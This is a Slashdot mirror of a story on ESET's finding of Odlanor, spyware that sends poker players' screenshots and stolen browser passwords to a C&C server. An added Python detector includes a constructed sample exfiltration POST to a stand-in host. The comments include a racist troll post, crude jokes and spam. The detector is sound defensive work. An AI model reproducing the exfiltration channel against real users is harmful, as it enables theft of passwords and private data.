Slashdot Mirror


What's In Your Hand? This Malware Knows

An anonymous reader writes with the story that ESET researchers have uncovered spyware targeting online poker players, called Odlanor, which works by sending screenshots of a player's game (along with that player's in-game identity) to the attacker; the attacker can then search for the player with that ID, and enjoy an unfair advantage. (Also at The Inquirer.) From the ESET report: In newer versions of the malware, general-purpose data-stealing functionality was added by running a version of NirSoft WebBrowserPassView, embedded in the Oldanor trojan. This tool, detected by ESET as Win32/PSWTool.WebBrowserPassView.B, is a legitimate, albeit potentially unsafe application, capable of extracting passwords from various web browsers. ... The trojan communicates with its C&C, the address of which is hardcoded in the binary, via HTTP. Part of the exfiltrated information, such as the malware version and information identifying the computer, is sent in the URL parameters. The rest of the collected information, including an archive with any screenshots or stolen passwords, is sent in the POST request data.
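The exfiltration shape ESET describes (identifying fields in the URL query string, an archive of screenshots and passwords in the POST body, plaintext HTTP to a fixed host) is something a proxy or IDS log can be checked for without knowing the sample's hash. The following is an added example, not code from ESET or from the Slashdot post: it parses raw HTTP/1.x requests and flags POSTs that carry version/identifier-style query parameters together with a ZIP archive in the body. The sample requests are constructed, and the parameter names (`ver`, `id`), the path `/gate.php` and the host `192.0.2.10` are assumptions for illustration, not Odlanor's real indicators.

```python
"""Flag plaintext HTTP exfiltration of the shape described in the ESET report:
identifying fields in the URL query + an archive in the POST body.

Added example; sample requests below are constructed and the parameter names,
path and host are assumptions, not indicators from the real malware.
"""
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Local-file header signature of a ZIP archive (what "an archive with any
# screenshots" most plausibly looks like on the wire).
ZIP_MAGIC = b"PK\x03\x04"

# Query keys that read like "malware version" / "machine identifier".
# These names are assumed for the example, not taken from the sample.
SUSPECT_KEYS = {"ver", "version", "id", "uid", "hwid", "pcid"}


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, target, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].decode("ascii", "replace").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def detect_exfil(raw: bytes) -> Optional[dict]:
    """Return a finding for a POST whose query string carries identifier-like
    keys and whose body contains a ZIP archive; None otherwise."""
    req = parse_http_request(raw)
    if req["method"] != "POST":
        return None
    parts = urlsplit(req["target"])
    query = parse_qs(parts.query)
    ident_keys = sorted(k for k in query if k.lower() in SUSPECT_KEYS)
    has_archive = ZIP_MAGIC in req["body"]
    if ident_keys and has_archive:
        return {
            "host": req["headers"].get("host", "?"),
            "path": parts.path,
            "ident_keys": ident_keys,
            "archive_bytes": len(req["body"]),
        }
    return None


# Constructed sample traffic (192.0.2.10 is a documentation address).
SAMPLE_EXFIL = (
    b"POST /gate.php?ver=1.3&id=DESKTOP-8F2A HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 30\r\n"
    b"\r\n"
    + ZIP_MAGIC + b"\x00" * 26
)

# An ordinary JSON upload that also has an "id" query key but no archive.
SAMPLE_BENIGN = (
    b"POST /api/upload?id=42 HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Type: application/json\r\n"
    b"\r\n"
    b'{"name":"x"}'
)


def scan(requests: list) -> list:
    """Run the detector over a batch of raw requests, keeping only hits."""
    return [f for f in (detect_exfil(r) for r in requests) if f is not None]


if __name__ == "__main__":
    for finding in scan([SAMPLE_EXFIL, SAMPLE_BENIGN]):
        print(finding)
```

The check keys on the structure of the channel rather than on the hardcoded C&C address, so it survives a re-packed sample with a new host; once the address is known it belongs in a blocklist alongside this rule. Because the body is matched for the ZIP signature anywhere, a multipart/form-data upload carrying the archive as one part is caught the same way as a raw octet-stream body.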

68 comments

  1. Another elitist software author by Anonymous Coward · · Score: 0

    Why do these arrogant pricks never consider cross-platform capability? I demand malware that works on free operating systems!

  2. Sounds like an opportunity to fleece the scammers by jandrese · · Score: 4, Insightful

    Unencrypted HTTP back channel? I would be tempted to leave this running and wait for someone to try to use it, then at a crucial time (on a big bet) change what is being sent back to them to make my hand look weaker than it is. Then you tell your AV to nuke it and change your passwords.

    --

    I read the internet for the articles.
  3. Re: Sounds like an opportunity to fleece the scam by Anonymous Coward · · Score: 0

    You beat me to it. Yep. I predict this will fail big time. If I had mod points and bothered to login I'd up vote as insightful.

  4. Simple solution by Anonymous Coward · · Score: 0

    Here's a simple solution: Don't play poker online.

    1. Re:Simple solution by JustAnotherOldGuy · · Score: 2

      Here's a simple solution: Don't play poker online.

      Seriously, I've never understood why ANYONE would trust online gambling. You have no idea what's on the other end, it just seems like the most idiotic way to lose your money imaginable. Just how gullible and trusting do you have to be to gamble online??

      At least at a real casino you can SEE the cards and chips and whatnot, but online? Why not just flush your money down the toilet and cut out the middle-man?

      --
      Just cruising through this digital world at 33 1/3 rpm...
    2. Re:Simple solution by nospam007 · · Score: 1

      "Seriously, I've never understood why ANYONE would trust online gambling. You have no idea what's on the other end,.."

      Usually 3-4 college kids who are sitting side by side, seeing each other's hand and fleecing the one or 2 morons at their table.

    3. Re:Simple solution by Anonymous Coward · · Score: 0

      Online gambling is actually a pretty tightly regulated industry -- at least in first world countries. Source code is audited by independent third parties, checksummed, and randomly audited to verify the operator has only approved code running on their production servers.

      As long as you're dealing with a properly licensed casino for your locality, you have no reason to believe that your chances are any different from a land-based casino. Which, by the way, the house always wins in either case. :)

      Disclosure: I write online casino software.

    4. Re:Simple solution by MyAlternateID · · Score: 1

      Here's a simple solution: Don't play poker online.

      Seriously, I've never understood why ANYONE would trust online gambling. You have no idea what's on the other end, it just seems like the most idiotic way to lose your money imaginable. Just how gullible and trusting do you have to be to gamble online??

      At least at a real casino you can SEE the cards and chips and whatnot, but online? Why not just flush your money down the toilet and cut out the middle-man?

      Won't somebody think of the poor middlemen?

    5. Re:Simple solution by sexconker · · Score: 0

      Your software can't prevent players from colluding with each other to cheat.

    6. Re:Simple solution by MagickalMyst · · Score: 1

      "I've never understood why ANYONE would trust online gambling."

      I used to work in the industry and it is as crooked as a $3 bill.

      --
      Political correctness is really just herd psychology pushed by insecure people who desperately seek social conformity.
    7. Re:Simple solution by Anonymous Coward · · Score: 0

      Indeed. (Same AC as above here.)

      I'll admit that I'm not knowledgeable of all types of gambling games. But the ones I've worked on have not had the angle where collusion between two or more parties in a game could result in reduced odds for non-colluding players. We run many simulations to ensure that we have a full understanding of all probabilities involved. (And if the math model doesn't match the empirical data, we know there's a bug somewhere. This actually happened once when there was a typo in the spec that a game was implemented off of. It was caught.)

    8. Re:Simple solution by Bookworm09 · · Score: 1

      What kinds of things did you see/hear about?

    9. Re:Simple solution by Anonymous Coward · · Score: 0

      Biggest cheating scandal was Ultimate Bet. The owners of the site used a special poker client software that showed them their opponents' cards to cheat players of their site out of an eight-figure dollar amount.

      And then there of course was Black Friday: the DOJ claimed that the 3 biggest online sites were committing bank fraud and money laundering. Some people went to prison, fines paid exceeded $1 billion, some cases are still ongoing, and online poker in the US has been basically dead since then.

      If you follow the twoplustwo poker forums you can find a new smaller cheating scandal every other week.

    10. Re:Simple solution by MagickalMyst · · Score: 1

      "What kinds of things did you see/hear about?"

      Illegal gaming servers; fraud; deceptive marketing practices; intimidation; threats of violence and blackmail; etc.

      The industry is run by rich, crooked money-grubbers who only care about making more money - at the expense of everyone else.

      I wish online gambling was just a business like any other (that's what they tell you in the industry), but the truth is that it is rotten to the core. On the positive side, I did learn a lot working for the casinos - about business, marketing and of course IT.

      --
      Political correctness is really just herd psychology pushed by insecure people who desperately seek social conformity.
  5. Great news by frovingslosh · · Score: 2

    This is great news. I hated only being cheated by the site operators.

    --
    I'm an American. I love this country and the freedoms that we used to have.
    1. Re:Great news by Anonymous Coward · · Score: 0

      I'm actually kinda surprised no one has made "blockchain poker" yet

  6. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by Ginger+Unicorn · · Score: 0

    You seemed to have posted this several times today. I don't get it - what response are you hoping for? If it's mild confusion and wondering what it is that might motivate someone to devote a lot of time to doing this then I suppose I'm guilty of feeding the trolls.

    --
    (1.21 gigawatts) / (88 miles per hour) = 30 757 874 newtons
  7. Enjoy an unfair advantage? by DougOtto · · Score: 1

    Duh. Is there ever a situation where you wouldn't enjoy an unfair advantage?

    --
    Solving Unix problems since 1989...
  8. Re:Sounds like an opportunity to fleece the scamm by FredGauss · · Score: 1

    I would be tempted to leave this running and wait for someone to try to use it, then at a crucial time (on a big bet) change what is being sent back to them to make my hand look weaker than it is.

    This. or goatse.

  9. Bottom feeders by sysrammer · · Score: 2

    Even without this, it's way too easy to cheat online. From simple collusion between multiple players, to bottom-feeders that spend all their time collecting a few bucks playing several nickel-ante games at once, it all adds up.

    On the internet, there is no such thing as a friendly game of cards.

    --
    His ignorance covered the whole earth like a blanket, and there was hardly a hole in it anywhere. - Mark Twain
    1. Re:Bottom feeders by Frosty+Piss · · Score: 1

      to bottom-feeders that spend all their time collecting a few bucks playing several nickel-ante games at once

      How is that cheating?

      --
      If you want news from today, you have to come back tomorrow.
    2. Re:Bottom feeders by sysrammer · · Score: 1

      Ok, you got me. Not cheating. But on the same moral level as seal clubbers.

      --
      His ignorance covered the whole earth like a blanket, and there was hardly a hole in it anywhere. - Mark Twain
    3. Re:Bottom feeders by Frosty+Piss · · Score: 1

      I would say it's a good strategy to make money in a shark pool.

      --
      If you want news from today, you have to come back tomorrow.
  10. Where are the Slashdot editors? Meh... by __aaclcg7560 · · Score: 1

    What's In Your Hand? The Shadow Knows

    FTFY - Link below for the /. youngsters.

    https://en.wikipedia.org/wiki/The_Shadow

  11. Re:Sounds like an opportunity to fleece the scamm by Anonymous Coward · · Score: 0

    "What's in your hand?" Your penis. That's where it always is. Let 'em see a pic of THAT.

  12. Deceptive headline by bigdavex · · Score: 4, Funny

    I assumed this was about porn.

    --
    -Dave
  13. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by deKernel · · Score: 1

    Glad I am not the only one that was left scratching my head of sorts. I skimmed quickly and then thought to myself: what a waste of time.

  14. Do you understand how slashdot works? by frovingslosh · · Score: 0

    You're about to be modded down by on-line poker players who desperately want to believe that they are not being cheated and feel compelled to silence anyone who says otherwise.

    --
    I'm an American. I love this country and the freedoms that we used to have.
  15. Easy answer by Anonymous Coward · · Score: 1

    What's In Your Hand? Your dick. At least for 99% of slashdot users.

    1. Re:Easy answer by PopeRatzo · · Score: 1

      What's In Your Hand? Your dick. At least for 99% of slashdot users.

      Wrong. For 83% of Slashdot users, it's someone else's dick.

      --
      You are welcome on my lawn.
    2. Re:Easy answer by Anonymous Coward · · Score: 0

      You've obviously researched the matter. Voice of experience.

  16. You could have fun with this... by toonces33 · · Score: 1

    You could tweak the thing to intentionally send the wrong information to the people controlling the malware. They might think you have one hand and bet accordingly, when in fact you have something completely different. The problem is that they would figure out that something was wrong pretty quickly.

  17. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by toonces33 · · Score: 1

    This nonsense has been posted for months. Usually it gets modded down to -1 pretty quickly so most people won't even see it, but someone out there chooses to waste their time posting this gunk.

  18. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by Anonymous Coward · · Score: 0

    He doesn't necessarily need a response. He is merely fulfilling the important role of keeping Slashdot's venerable troll tradition visible. While they might not be to your particular taste, greased-up yoda dolls and GNAA are a major part of the culture that Slashdot has built up over the years, a complex of shared references that bind this community together. Like many people whose Slashdot experience goes back to the turn of the millennium, I read this site as much for the troll lore as the tech news.

  19. Re:Sounds like an opportunity to fleece the scamm by Anonymous Coward · · Score: 0

    "What's in your hand?" Your penis. That's where it always is. Let 'em see a pic of THAT.

    That depends. Does your camera have sufficiently high resolution?

  20. Really? by s.petry · · Score: 1

    I don't get it - what response are you hoping for?

    ANY! Don't feed the trolls!

    --

    -The wise argue that there are few absolutes, the fool argues that there are no probabilities.

  21. What's in my hand? by Anonymous Coward · · Score: 0

    I mean, sure, it knows. But it really wishes it didn't.

  22. Re:Sounds like an opportunity to fleece the scamm by TheCarp · · Score: 1

    Um fuck no. If you go that route, you nuke the whole PC after.

    Anyway, depends how it's implemented. If they are smart, it grabs your hole cards at the beginning of the hand, before any real information exists for you to switch them on. If they do that, it's going to be harder to pull this off.

    Better strategy is to just make your cards, as far as he sees them, random on each round, and visible to you....so you know what he thinks you have. Even better, you stack the table with friends and start out "playing straight" with him and let him win a little, then turn on the randomizers and fuck his world.

    --
    "I opened my eyes, and everything went dark again"
  23. Wait by hyperar · · Score: 1

    Is it "Odlanor" or "Oldanor"?

  24. The Confederate Navy wants you! by Anonymous Coward · · Score: 0

    The Confederate Navy wants you to know that this is a modern fleet. This is not your great-great-great-great-great-great-grandfather's navy. We welcome all. Gays, Niggers, Gayniggers, even chicks. You are all invited to join. Best of all, the most popular Confederate flag is actually a naval ensign, so you can fly it from your mast and be truly authentic. Come join today. It's simple. See a story that's just too PC or stupid, or just don't like it? Post a few lines, and then "You have been sunk by a Confederate submarine. BOOM! Glug, glug, glug.". That's all it takes and you're in. Don't be a racist though. You'll be keel-hauled, I swear. Trolling, not hate.

  25. "Odlanor" is "ronaldO" backward by Kevoco · · Score: 1

    just saying

    1. Re:"Odlanor" is "ronaldO" backward by GTRacer · · Score: 1

      Ever since the days of the old "Tobor" electronic robot toy, any time I see a seemingly-nonsense name, I reverse the letters. Not surprisingly, this resolves to something a fair amount of the time!

      --
      Defending IP by destroying access to it? That makes sense, RIAA/MPAA. Go to the corner until you can play nice!
    2. Re:"Odlanor" is "ronaldO" backward by sysrammer · · Score: 1

      "Tobor...The Eight Man" was the intro, or something like that. I was fairly young when I first saw that, and was mighty pleased when I figured out the puzzle. Saw it on UHF with the other Japanese cartoons. That, Speed Racer and Kimba.

      On a semi-related note, I thought the mouth moving with no voice, and vice versa, was funny. Many years later, went to Japan, and turned on a TV. There was a dubbed John Wayne movie. We laughed, then got bored. Their idea of a John Wayne voice did not appeal. So we turned down the volume and made our own dialogue. Good times. MST3k in the 70's!

      --
      His ignorance covered the whole earth like a blanket, and there was hardly a hole in it anywhere. - Mark Twain
  26. What's in my hand? LOL... by Anonymous Coward · · Score: 0

    My cock is in my hand right now... ok well currently as I type it's in my girlfriend's hand, and pretty soon it will be somewhere else, but whatever ;-)

  27. Re:Sounds like an opportunity to fleece the scamm by Khashishi · · Score: 1

    Unencrypted HTTP back channel? I would be tempted to leave this running and wait for someone to try to use it, then at a crucial time (on a big bet) change what is being sent back to them to make my hand look weaker than it is. Then you tell your AV to nuke it and change your passwords.

    Damn, someone should make a movie of this. It's got everything.

  28. Between this, patching + security hardening by Anonymous Coward · · Score: 0

    See subject: I never GET malware @ all -> APK Hosts File Engine 9.0++ SR-2 32/64-bit http://start64.com/index.php?o...

    FREE & adds speed, security, + reliability, doing more with less, more efficiently vs. browser addons & locally installed DNS servers @ home + fixes DNS' redirect security issues - obtaining its data vs. online threats & adbanner blocking from 10 reputable sites in the security community - using something you already have vs. "bolting on browser addons 'MOAR' that's usermode slower & increases messagepassing, cpu + ram overuse overheads & actually SPEEDS YOU UP 2 ways (adblocking + locally cached in RAM favorites placed @ the TOP of hosts for fastest resolution speed), whereas by way of comparison, other "so-called security 'solutions'" SLOW YOU DOWN!

    * :)

    MalwareBytes' hpHosts Admin (MalwareBytes employee) hosts & recommends it -> http://hosts-file.net/?s=Downl... & MalwareBytes = BEST antivirus per this VERY recent testing of them all http://www.av-test.org/en/news...

    &

    It's GUARANTEED safe & clean per it being checked by 57 antivirus programs recently in BOTH its 64-bit model https://www.virustotal.com/en/...

    +

    In its 32-bit model also https://www.virustotal.com/en/...

    ---

    "The premise is quite simple: Take something designed by nature & reprogram it to make it work for the body rather than against it..." - Dr. Alice Krippen: "I am legend"...

    APK

    P.S.=> By "yours truly" - "The Lord of Hosts" so-to-speak:

    PERTINENT QUOTE/EXCERPT:

    "The image this title brings to mind is of a mighty military commander, one who can at a mere word summon rank upon rank of protective power" from https://answers.yahoo.com/ques... & THAT WORD = hosts!

    (Accept NO substitutes!)

    ...apk

  29. Re:Sounds like an opportunity to fleece the scamm by climb_no_fear · · Score: 1

    Random? How does that work without tipping him/her off, since there's a reasonable chance that one of the cards you have in your random hand is already in his/her hand, right ?

  30. Re:Sounds like an opportunity to fleece the scamm by Anonymous Coward · · Score: 0

    Won't work as the play is still stacked against you considerably.

    With the exploit working as expected: the scammer knows your hands perfectly while you know nothing. The scammer plays to eke out as much of your money as possible and (if smart) will win and lose a few so you feel you're having an "unlucky" day.

    With the exploit exploited as you suggest: the second the scammer sees that your cards were not what was expected he/she knows the game is up and leaves the game. Immediately. Of course the hand may get big, but the caps mean that the scammer will never really lose much. And, you then have an online adversary with a grudge and l33t skillz on your tail!

  31. Poker malware is sponsored by.... by Anonymous Coward · · Score: 0

    Golden Palace?

  32. Re:Sounds like an opportunity to fleece the scamm by TheCarp · · Score: 1

    OTOH....

    He might assume that there is a flaw in his program or even that the poker company is on to him, and might waste hours trying to figure out what the problem is...and that could be some serious win.

    --
    "I opened my eyes, and everything went dark again"
  33. Anyone who gambles via the internet by mark_reh · · Score: 1

    is a moron and deserves to get sheared like the sheep he/she is.

    1. Re:Anyone who gambles via the internet by Anonymous Coward · · Score: 0

      You could say the same for offline gambling, too. Adding a computer doesn't make it any less of a losing game. :)

    2. Re:Anyone who gambles via the internet by frovingslosh · · Score: 1

      If you don't think that adding a computer (and the Internet) that the computer owner can control, see all of the cards in everyone's hand and all of the cards coming up, and even change the order of the cards coming up, or trade out his unexposed cards for ones coming up, then you really don't understand the game and the odds. And it is people who don't understand the game and the odds who should not be playing.

      --
      I'm an American. I love this country and the freedoms that we used to have.
  34. I wasn't doing anything! by wonkey_monkey · · Score: 1

    What's In Your Hand? This Malware Knows

    I was just scratching an itch!

    --
    systemd is Roko's Basilisk.
    1. Re:I wasn't doing anything! by Anonymous Coward · · Score: 0

      Yup, an itch in your nether regions. That required persistent, repeated scratching.

  35. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by PIBM · · Score: 1

    Wow, I just have to reply .. I almost gave up scrolling since it was that long! Is that randomly generated text or an experiment with chimps typing?

  36. Nope. by Anonymous Coward · · Score: 0

    It has no idea what I have in my hand.

  37. Re:Sounds like an opportunity to fleece the scamm by Anonymous Coward · · Score: 0

    that sounds fun.

    too bad you will never know WHEN you are playing vs the scammer, as you will not know their handle.

  38. Re:Sounds like an opportunity to fleece the scamm by jandrese · · Score: 1

    Yeah, once you change the cards once the scammer will know something is up. Once there is a discrepancy between the publicly available information and his back channel he will bail. You can fold a lot to reduce the amount of information you make public, but sooner or later you gotta show your hand.

    --

    I read the internet for the articles.
  39. Win32/PSWTool Malware .. by nickweller · · Score: 1

    I assume this Win32/PSWTool malware only works on Microsoft Windows ..

  40. Re: Adolph Hitroll here with a Greasy Yoda up GNAA by Anonymous Coward · · Score: 0

    Dude it's a bot. STFU it won't respond anyways.

  41. WTF by Anonymous Coward · · Score: 0

    A legitimate application they call it, and then say it steals passwords.
    So which is it? Once it makes that step to steal passwords the app is no longer legit.

    I guess they mean it doesn't try to hide? As in it shows up in task/resource manager? If that's all it takes to be a legit app then some versions of crypto locker and all those rogue A/V programs and many Trojans are legit too.

  42. But who knows... by Anonymous Coward · · Score: 0

    ... What evil lurks in the hearts of men? THE SHADOW KNOWS!

  43. Re: Adolph Hitroll here with a Greasy Yoda up GNAA by Ginger+Unicorn · · Score: 1

    Then it makes even less sense.

    --
    (1.21 gigawatts) / (88 miles per hour) = 30 757 874 newtons